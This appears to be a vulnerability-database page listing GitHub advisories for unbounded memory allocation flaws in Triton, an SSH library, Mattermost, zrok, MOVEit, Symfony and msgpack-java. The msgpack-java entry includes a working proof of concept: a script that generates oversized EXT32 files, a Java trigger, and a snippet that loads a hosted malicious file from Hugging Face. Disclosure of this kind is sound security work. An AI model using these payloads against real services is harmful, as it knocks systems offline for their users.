CWE-789
AllowedMemory Allocation with Excessive Size Value
Abstraction: Variant · Status: Draft
The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.
321 vulnerabilities reference this CWE, most recent first.
GHSA-CFGW-6MRW-577F
Vulnerability from github – Published: 2026-04-07 18:31 – Updated: 2026-04-07 18:31NVIDIA Triton Inference Server contains a vulnerability where insufficient input validation and a large number of outputs could cause a server crash. A successful exploit of this vulnerability might lead to denial of service.
{
"affected": [],
"aliases": [
"CVE-2026-24146"
],
"database_specific": {
"cwe_ids": [
"CWE-789"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-07T18:16:39Z",
"severity": "HIGH"
},
"details": "NVIDIA Triton Inference Server contains a vulnerability where insufficient input validation and a large number of outputs could cause a server crash. A successful exploit of this vulnerability might lead to denial of service.",
"id": "GHSA-cfgw-6mrw-577f",
"modified": "2026-04-07T18:31:38Z",
"published": "2026-04-07T18:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24146"
},
{
"type": "WEB",
"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5816"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24146"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CH3Q-CW5R-F4HG
Vulnerability from github – Published: 2026-06-12 21:02 – Updated: 2026-07-08 17:35Summary
The SSH protocol parser trusted attacker-controlled length and count fields without first checking that the declared values fit within the containing packet.
When a client connects to a malicious or compromised SSH server, the server can send a small, malformed packet containing an inner field whose declared length is much larger than the packet itself. The Kaitai Struct Java runtime attempts to allocate a byte array using the declared length before it discovers that the input is truncated. A sufficiently large value can therefore cause excessive memory allocation or an uncaught OutOfMemoryError, potentially terminating the application process that uses the library.
Applications that enable SSH agent forwarding have an additional attack path: the connected server can send malformed agent protocol messages containing the same class of oversized inner length.
Details
SSH uses unsigned 32-bit length prefixes for strings and other protocol structures. Before the fix, several Kaitai Struct definitions passed these lengths directly to generated parsing code. For example, the byte-string definition read a uint32 followed by an array of that size without validating the size against the bytes remaining in the current stream.
The SSH transport limits the size of an outer packet, but an inner field in that packet could still declare a length approaching the Java array size limit. The Kaitai runtime allocates the destination array before reading from the bounded input stream. Consequently, an attacker does not need to transmit an equally large packet to trigger the allocation attempt.
Malformed count fields could also cause parsers to attempt an unreasonable number of repeated elements. The fix validates both byte lengths and element counts against the size of their containing stream.
Parsing failures previously surfaced inconsistently as unchecked runtime exceptions. The fixed version converts malformed SSH packets to a transport protocol error and returns an SSH agent failure response for malformed agent requests.
Attack Requirements
For the general SSH packet path:
- A user or application must initiate a connection to an attacker-controlled or compromised SSH server.
- Authentication is not required.
- No optional library feature is required.
- The server only needs to return a malformed SSH packet containing an oversized inner length or count.
For the agent protocol path, SSH agent forwarding must additionally be enabled.
Impact
Successful exploitation can cause excessive heap allocation and loss of availability of the application process. In constrained environments, a single small malicious packet can cause an OutOfMemoryError.
No confidentiality or integrity impact has been demonstrated.
Remediation
Upgrade to version 0.3.1 or later.
The fix:
- Validates length-prefixed fields against the remaining bytes in their containing Kaitai stream.
- Validates repeated-element counts against the minimum encoded size of each element.
- Validates SSH transport and agent frame lengths and padding constraints.
- Converts malformed SSH packet parsing failures into
TransportException. - Returns
SSH_AGENT_FAILUREfor malformed forwarded-agent requests instead of allowing parser exceptions to escape.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.connectbot.sshlib:sshlib"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54700"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-789"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-12T21:02:01Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe SSH protocol parser trusted attacker-controlled length and count fields without first checking that the declared values fit within the containing packet.\n\nWhen a client connects to a malicious or compromised SSH server, the server can send a small, malformed packet containing an inner field whose declared length is much larger than the packet itself. The Kaitai Struct Java runtime attempts to allocate a byte array using the declared length before it discovers that the input is truncated. A sufficiently large value can therefore cause excessive memory allocation or an uncaught `OutOfMemoryError`, potentially terminating the application process that uses the library.\n\nApplications that enable SSH agent forwarding have an additional attack path: the connected server can send malformed agent protocol messages containing the same class of oversized inner length.\n\n## Details\n\nSSH uses unsigned 32-bit length prefixes for strings and other protocol structures. Before the fix, several Kaitai Struct definitions passed these lengths directly to generated parsing code. For example, the byte-string definition read a `uint32` followed by an array of that size without validating the size against the bytes remaining in the current stream.\n\nThe SSH transport limits the size of an outer packet, but an inner field in that packet could still declare a length approaching the Java array size limit. The Kaitai runtime allocates the destination array before reading from the bounded input stream. Consequently, an attacker does not need to transmit an equally large packet to trigger the allocation attempt.\n\nMalformed count fields could also cause parsers to attempt an unreasonable number of repeated elements. The fix validates both byte lengths and element counts against the size of their containing stream.\n\nParsing failures previously surfaced inconsistently as unchecked runtime exceptions. The fixed version converts malformed SSH packets to a transport protocol error and returns an SSH agent failure response for malformed agent requests.\n\n## Attack Requirements\n\nFor the general SSH packet path:\n\n- A user or application must initiate a connection to an attacker-controlled or compromised SSH server.\n- Authentication is not required.\n- No optional library feature is required.\n- The server only needs to return a malformed SSH packet containing an oversized inner length or count.\n\nFor the agent protocol path, SSH agent forwarding must additionally be enabled.\n\n## Impact\n\nSuccessful exploitation can cause excessive heap allocation and loss of availability of the application process. In constrained environments, a single small malicious packet can cause an `OutOfMemoryError`.\n\nNo confidentiality or integrity impact has been demonstrated.\n\n## Remediation\n\nUpgrade to version `0.3.1` or later.\n\nThe fix:\n\n- Validates length-prefixed fields against the remaining bytes in their containing Kaitai stream.\n- Validates repeated-element counts against the minimum encoded size of each element.\n- Validates SSH transport and agent frame lengths and padding constraints.\n- Converts malformed SSH packet parsing failures into `TransportException`.\n- Returns `SSH_AGENT_FAILURE` for malformed forwarded-agent requests instead of allowing parser exceptions to escape.",
"id": "GHSA-ch3q-cw5r-f4hg",
"modified": "2026-07-08T17:35:55Z",
"published": "2026-06-12T21:02:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/connectbot/cbssh/security/advisories/GHSA-ch3q-cw5r-f4hg"
},
{
"type": "PACKAGE",
"url": "https://github.com/connectbot/cbssh"
},
{
"type": "WEB",
"url": "https://github.com/connectbot/cbssh/releases/tag/v0.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "ConnectBot SSH Client Library: Unbounded SSH field lengths can cause excessive memory allocation"
}
GHSA-CJM8-JXPW-G43M
Vulnerability from github – Published: 2026-05-18 09:31 – Updated: 2026-06-01 15:09Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate 7zip archive structure before processing which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted 7zip file with excessive folder declarations.. Mattermost Advisory ID: MMSA-2026-00573
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "11.5.0"
},
{
"fixed": "11.5.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "10.11.0"
},
{
"fixed": "10.11.14"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "11.4.0"
},
{
"fixed": "11.4.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.0.0-20260325191733-fb11968f8798"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.3.2-0.20260325191733-fb11968f8798"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-6340"
],
"database_specific": {
"cwe_ids": [
"CWE-789"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-01T15:09:30Z",
"nvd_published_at": "2026-05-18T08:16:14Z",
"severity": "MODERATE"
},
"details": "Mattermost versions 11.5.x \u003c= 11.5.1, 10.11.x \u003c= 10.11.13, 11.4.x \u003c= 11.4.3 fail to validate 7zip archive structure before processing which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted 7zip file with excessive folder declarations.. Mattermost Advisory ID: MMSA-2026-00573",
"id": "GHSA-cjm8-jxpw-g43m",
"modified": "2026-06-01T15:09:30Z",
"published": "2026-05-18T09:31:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6340"
},
{
"type": "WEB",
"url": "https://github.com/mattermost/mattermost/commit/fb11968f8798925c7b75711025bc5f991124ba26"
},
{
"type": "PACKAGE",
"url": "https://github.com/mattermost/mattermost"
},
{
"type": "WEB",
"url": "https://mattermost.com/security-updates"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Mattermost doesn\u0027t validate 7zip archive structure before processing"
}
GHSA-CMFX-9CXF-9XXJ
Vulnerability from github – Published: 2022-03-29 00:01 – Updated: 2022-04-05 00:00** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in WEKA INTEREST Security Scanner up to 1.8 and classified as problematic. This vulnerability affects unknown code of the component Portscan. The manipulation with an unknown input leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
{
"affected": [],
"aliases": [
"CVE-2017-20016"
],
"database_specific": {
"cwe_ids": [
"CWE-770",
"CWE-789"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-28T21:15:00Z",
"severity": "HIGH"
},
"details": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in WEKA INTEREST Security Scanner up to 1.8 and classified as problematic. This vulnerability affects unknown code of the component Portscan. The manipulation with an unknown input leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.",
"id": "GHSA-cmfx-9cxf-9xxj",
"modified": "2022-04-05T00:00:46Z",
"published": "2022-03-29T00:01:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20016"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.101969"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.101974"
},
{
"type": "WEB",
"url": "http://www.computec.ch/news.php?item.117"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CPF9-PH2J-CCR9
Vulnerability from github – Published: 2026-04-16 21:09 – Updated: 2026-04-24 20:48Summary endpoints.GetSessionCookie parses an attacker-supplied cookie chunk count and calls make([]string, count) with no upper bound before any token validation occurs. The function is reached on every request to an OAuth-protected proxy share, allowing an unauthenticated remote attacker to trigger gigabyte-scale heap allocations per request, leading to process-level OOM termination or repeated goroutine panics. Both publicProxy and dynamicProxy are affected.
- Attack Vector: Network — exploitable via a single HTTP request with a crafted Cookie header.
- Attack Complexity: Low — no preconditions or chaining required; the attacker only needs to know the cookie name (publicly derivable from any OAuth redirect).
- Privileges Required: None — reached before JWT validation or any authentication check.
- User Interaction: None.
- Scope: Unchanged — impact is confined to the affected proxy process.
- Confidentiality Impact: None.
- Integrity Impact: None.
Availability Impact: High — sustained or concurrent requests cause OOM process termination, taking down the proxy for all users of all shares it serves.
Affected Components - endpoints/oauthCookies.go — GetSessionCookie (line 81) - endpoints/publicProxy/authOAuth.go — handleOAuth (line 50) — call site, pre-auth - endpoints/dynamicProxy/cookies.go — getSessionCookie (line 29) — call site
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/openziti/zrok"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.1.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/openziti/zrok/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40303"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-789"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T21:09:08Z",
"nvd_published_at": "2026-04-17T21:16:35Z",
"severity": "HIGH"
},
"details": "**Summary**\nendpoints.GetSessionCookie parses an attacker-supplied cookie chunk count and calls make([]string, count) with no upper bound before any token validation occurs. The function is reached on every request to an OAuth-protected proxy share, allowing an unauthenticated remote attacker to trigger gigabyte-scale heap allocations per request, leading to process-level OOM termination or repeated goroutine panics. Both publicProxy and dynamicProxy are affected.\n\n- Attack Vector: Network \u2014 exploitable via a single HTTP request with a crafted Cookie header.\n- Attack Complexity: Low \u2014 no preconditions or chaining required; the attacker only needs to know the cookie name (publicly derivable from any OAuth redirect).\n- Privileges Required: None \u2014 reached before JWT validation or any authentication check.\n- User Interaction: None.\n- Scope: Unchanged \u2014 impact is confined to the affected proxy process.\n- Confidentiality Impact: None.\n- Integrity Impact: None.\n\nAvailability Impact: High \u2014 sustained or concurrent requests cause OOM process termination, taking down the proxy for all users of all shares it serves.\n\n**Affected Components**\n- endpoints/oauthCookies.go \u2014 GetSessionCookie (line 81)\n- endpoints/publicProxy/authOAuth.go \u2014 handleOAuth (line 50) \u2014 call site, pre-auth\n- endpoints/dynamicProxy/cookies.go \u2014 getSessionCookie (line 29) \u2014 call site",
"id": "GHSA-cpf9-ph2j-ccr9",
"modified": "2026-04-24T20:48:49Z",
"published": "2026-04-16T21:09:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openziti/zrok/security/advisories/GHSA-cpf9-ph2j-ccr9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40303"
},
{
"type": "PACKAGE",
"url": "https://github.com/openziti/zrok"
},
{
"type": "WEB",
"url": "https://github.com/openziti/zrok/releases/tag/v2.0.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "zrok: Unauthenticated DoS via unbounded memory allocation in striped session cookie parsing"
}
GHSA-CPWG-526G-9GC5
Vulnerability from github – Published: 2026-05-20 15:35 – Updated: 2026-05-20 15:35Uncontrolled Memory Allocation vulnerability in Progress Software MOVEit Automation allows Excessive Allocation.
This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7.
{
"affected": [],
"aliases": [
"CVE-2026-8485"
],
"database_specific": {
"cwe_ids": [
"CWE-789"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-20T14:17:04Z",
"severity": "MODERATE"
},
"details": "Uncontrolled Memory Allocation vulnerability in Progress Software MOVEit Automation allows Excessive Allocation.\n\nThis issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7.",
"id": "GHSA-cpwg-526g-9gc5",
"modified": "2026-05-20T15:35:34Z",
"published": "2026-05-20T15:35:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8485"
},
{
"type": "WEB",
"url": "https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CR49-FX2V-9P57
Vulnerability from github – Published: 2022-05-17 04:19 – Updated: 2024-04-25 22:07The Security component in Symfony 2.0.x before 2.0.25, 2.1.x before 2.1.13, 2.2.x before 2.2.9, and 2.3.x before 2.3.6 allows remote attackers to cause a denial of service (CPU consumption) via a long password that triggers an expensive hash computation, as demonstrated by a PBKDF2 computation, a similar issue to CVE-2013-5750.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.25"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/polyfill"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.10.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/security"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.25"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/security"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/security"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/security"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2013-5958"
],
"database_specific": {
"cwe_ids": [
"CWE-789"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-25T22:04:14Z",
"nvd_published_at": "2014-12-27T18:59:00Z",
"severity": "MODERATE"
},
"details": "The Security component in Symfony 2.0.x before 2.0.25, 2.1.x before 2.1.13, 2.2.x before 2.2.9, and 2.3.x before 2.3.6 allows remote attackers to cause a denial of service (CPU consumption) via a long password that triggers an expensive hash computation, as demonstrated by a PBKDF2 computation, a similar issue to CVE-2013-5750.",
"id": "GHSA-cr49-fx2v-9p57",
"modified": "2024-04-25T22:07:30Z",
"published": "2022-05-17T04:19:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-5958"
},
{
"type": "WEB",
"url": "https://github.com/symfony/symfony/issues/11522"
},
{
"type": "WEB",
"url": "https://github.com/symfony/polyfill/pull/155"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/polyfill/CVE-2013-5958.yaml"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2013-5958.yaml"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2013-5958.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/symfony/symfony"
},
{
"type": "WEB",
"url": "https://symfony.com/blog/security-releases-cve-2013-5958-symfony-2-0-25-2-1-13-2-2-9-and-2-3-6-released"
},
{
"type": "WEB",
"url": "http://symfony.com/blog/security-releases-cve-2013-5958-symfony-2-0-25-2-1-13-2-2-9-and-2-3-6-released"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Symfony Denial of Service Via Long Password Hashing"
}
GHSA-CW39-R4H6-8J3X
Vulnerability from github – Published: 2026-01-05 14:59 – Updated: 2026-01-05 14:59Summary
Affected Components:
org.msgpack.core.MessageUnpacker.readPayload()
org.msgpack.core.MessageUnpacker.unpackValue()
org.msgpack.value.ExtensionValue.getData()
A denial-of-service vulnerability exists in MessagePack for Java when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation.
PoC
import msgpack
import struct
import os
OUTPUT_DIR = "bombs"
os.makedirs(OUTPUT_DIR, exist_ok=True)
# EXT format: fixext / ext8 / ext16 / ext32
# ext32 allows attacker-controlled length (uint32)
length = 1
step = 10_000_000
while True:
try:
# EXT32: 0xC9 | length (4 bytes) | type (1 byte)
header = b'\xC9' + struct.pack(">I", length) + b'\x01'
payload = b'A' # actual data tiny
data = header + payload
fname = f"{OUTPUT_DIR}/ext_length_{length}.msgpack"
with open(fname, "wb") as f:
f.write(data)
print(f"[+] Generated EXT bomb with declared length={length}")
length += step
except Exception as e:
print("[!] Stopped:", e)
break
Download dependency: curl -LO https://repo1.maven.org/maven2/org/msgpack/msgpack-core/0.9.8/msgpack-core-0.9.8.jar Java Reproducer
// Main.java
import org.msgpack.core.MessagePack;
import org.msgpack.core.MessageUnpacker;
import org.msgpack.value.ExtensionValue;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Main {
public static void main(String[] args) throws Exception {
byte[] data = Files.readAllBytes(
Paths.get("ext_length_470000001.msgpack")
);
MessageUnpacker unpacker =
MessagePack.newDefaultUnpacker(data);
ExtensionValue ext =
unpacker.unpackValue().asExtensionValue();
// Vulnerability trigger:
byte[] payload = ext.getData();
System.out.println(payload.length);
}
}
Compile
javac -cp msgpack-core-0.9.8.jar Main.java
Run (with limited heap)
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
Observed Result:
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
at org.msgpack.core.MessageUnpacker.readPayload(...)
at org.msgpack.core.MessageUnpacker.unpackValue(...)
var u = new java.net.URL("https://huggingface.co/Blackbloodhacker/msgpack/resolve/main/ext_length_470000001.msgpack");
var d = u.openStream().readAllBytes();
var up = org.msgpack.core.MessagePack.newDefaultUnpacker(d);
up.unpackValue().asExtensionValue().getData();
Run:
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
A remotely hosted model file on Hugging Face can cause denial of service when loaded by a Java-based consumer.
Resolution
This issue is addressed in https://github.com/msgpack/msgpack-java/commit/daa2ea6b2f11f500e22c70a22f689f7a9debdeae by gradually allocating memory for large inputs, for both EXT32/BIN32 data types. This patch is released in msgpack-java 0.9.11 https://github.com/msgpack/msgpack-java/releases/tag/v0.9.11
Impact
This vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.msgpack:msgpack-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-21452"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-789"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T14:59:12Z",
"nvd_published_at": "2026-01-02T21:16:03Z",
"severity": "HIGH"
},
"details": "### Summary\nAffected Components:\n```\norg.msgpack.core.MessageUnpacker.readPayload()\norg.msgpack.core.MessageUnpacker.unpackValue()\norg.msgpack.value.ExtensionValue.getData()\n```\nA denial-of-service vulnerability exists in MessagePack for Java when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation.\n\n### PoC\n```\nimport msgpack\nimport struct\nimport os\n\nOUTPUT_DIR = \"bombs\"\nos.makedirs(OUTPUT_DIR, exist_ok=True)\n\n# EXT format: fixext / ext8 / ext16 / ext32\n# ext32 allows attacker-controlled length (uint32)\n\nlength = 1\nstep = 10_000_000\n\nwhile True:\n try:\n # EXT32: 0xC9 | length (4 bytes) | type (1 byte)\n header = b\u0027\\xC9\u0027 + struct.pack(\"\u003eI\", length) + b\u0027\\x01\u0027\n payload = b\u0027A\u0027 # actual data tiny\n\n data = header + payload\n\n fname = f\"{OUTPUT_DIR}/ext_length_{length}.msgpack\"\n with open(fname, \"wb\") as f:\n f.write(data)\n\n print(f\"[+] Generated EXT bomb with declared length={length}\")\n length += step\n\n except Exception as e:\n print(\"[!] Stopped:\", e)\n break\n```\nDownload dependency: curl -LO https://repo1.maven.org/maven2/org/msgpack/msgpack-core/0.9.8/msgpack-core-0.9.8.jar Java Reproducer\n```\n// Main.java\nimport org.msgpack.core.MessagePack;\nimport org.msgpack.core.MessageUnpacker;\nimport org.msgpack.value.ExtensionValue;\n\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\n\npublic class Main {\n public static void main(String[] args) throws Exception {\n\n byte[] data = Files.readAllBytes(\n Paths.get(\"ext_length_470000001.msgpack\")\n );\n\n MessageUnpacker unpacker =\n MessagePack.newDefaultUnpacker(data);\n\n ExtensionValue ext =\n unpacker.unpackValue().asExtensionValue();\n\n // Vulnerability trigger:\n byte[] payload = ext.getData();\n\n System.out.println(payload.length);\n }\n}\n\n```\nCompile\n```\njavac -cp msgpack-core-0.9.8.jar Main.java\n```\nRun (with limited heap)\n```\njava -Xmx256m -cp .:msgpack-core-0.9.8.jar Main\n```\nObserved Result:\n```\nException in thread \"main\" java.lang.OutOfMemoryError: Java heap space\n at org.msgpack.core.MessageUnpacker.readPayload(...)\n at org.msgpack.core.MessageUnpacker.unpackValue(...)\n```\n```\nvar u = new java.net.URL(\"https://huggingface.co/Blackbloodhacker/msgpack/resolve/main/ext_length_470000001.msgpack\");\nvar d = u.openStream().readAllBytes();\nvar up = org.msgpack.core.MessagePack.newDefaultUnpacker(d);\nup.unpackValue().asExtensionValue().getData();\n```\nRun:\n```\njava -Xmx256m -cp .:msgpack-core-0.9.8.jar Main\n```\nA remotely hosted model file on Hugging Face can cause denial of service when loaded by a Java-based consumer.\n\n## Resolution \nThis issue is addressed in https://github.com/msgpack/msgpack-java/commit/daa2ea6b2f11f500e22c70a22f689f7a9debdeae by gradually allocating memory for large inputs, for both EXT32/BIN32 data types. This patch is released in msgpack-java 0.9.11 https://github.com/msgpack/msgpack-java/releases/tag/v0.9.11\n\n### Impact\nThis vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems.",
"id": "GHSA-cw39-r4h6-8j3x",
"modified": "2026-01-05T14:59:12Z",
"published": "2026-01-05T14:59:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/msgpack/msgpack-java/security/advisories/GHSA-cw39-r4h6-8j3x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21452"
},
{
"type": "WEB",
"url": "https://github.com/msgpack/msgpack-java/commit/daa2ea6b2f11f500e22c70a22f689f7a9debdeae"
},
{
"type": "PACKAGE",
"url": "https://github.com/msgpack/msgpack-java"
},
{
"type": "WEB",
"url": "https://github.com/msgpack/msgpack-java/releases/tag/v0.9.11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
